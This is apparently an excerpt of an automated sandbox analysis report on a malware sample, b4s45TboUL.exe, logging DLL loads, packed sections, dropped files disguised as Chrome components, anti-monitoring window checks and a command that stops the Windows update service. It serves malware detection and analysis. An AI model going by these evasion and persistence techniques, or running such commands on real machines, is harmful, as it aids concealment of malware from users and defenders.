                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
                    Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: Binary string: my_library.pdbU source: b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: my_library.pdb source: b4s45TboUL.exe, b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: HIIDGCGCBF.exe, 00000004.00000002.1986378243.00007FF68D548000.00000040.00000001.01000000.00000008.sdmp, updater.exe, 0000002A.00000002.2010831986.00007FF7586B8000.00000040.00000001.01000000.0000000A.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: HIIDGCGCBF.exe, 00000004.00000002.1986378243.00007FF68D548000.00000040.00000001.01000000.00000008.sdmp, updater.exe, 0000002A.00000002.2010831986.00007FF7586B8000.00000040.00000001.01000000.0000000A.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeUnpacked PE file: 0.2.b4s45TboUL.exe.400000.1.unpack .text:ER;.data:W;.tehu:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeUnpacked PE file: 0.2.b4s45TboUL.exe.400000.1.unpack
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,0_2_0040A090
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                    Source: b4s45TboUL.exeStatic PE information: section name: .tehu
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name:
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name: .imports
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name: .themida
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name: .boot
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name: .imports
                    Source: chrome_131[1].exe.0.drStatic PE information: section name: .themida
                    Source: chrome_131[1].exe.0.drStatic PE information: section name: .boot
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name:
                    Source: updater.exe.4.drStatic PE information: section name: .imports
                    Source: updater.exe.4.drStatic PE information: section name: .themida
                    Source: updater.exe.4.drStatic PE information: section name: .boot
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0042A378 push eax; retf 0_2_0042A39D
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_0041B335 push ecx; ret 0_2_0041B348
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_6CFFDE51 push ecx; ret 0_2_6CFFDE64
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61EDA2A8 push ds; retf 0_2_61EDA2AE
                    Source: b4s45TboUL.exeStatic PE information: section name: .text entropy: 7.619569999320736
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: section name: entropy: 7.963078355074916
                    Source: chrome_131[1].exe.0.drStatic PE information: section name: entropy: 7.963078355074916
                    Source: updater.exe.4.drStatic PE information: section name: entropy: 7.963078355074916
                    Source: C:\ProgramData\HIIDGCGCBF.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile created: C:\ProgramData\chrome.dllJump to dropped file
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\chrome_131[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile created: C:\ProgramData\HIIDGCGCBF.exeJump to dropped file
                    Source: C:\ProgramData\HIIDGCGCBF.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile created: C:\ProgramData\chrome.dllJump to dropped file
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile created: C:\ProgramData\HIIDGCGCBF.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\ProgramData\HIIDGCGCBF.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeWindow searched: window name: FilemonClass
                    Source: C:\ProgramData\Google\Chrome\updater.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\ProgramData\Google\Chrome\updater.exeWindow searched: window name: RegmonClass
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
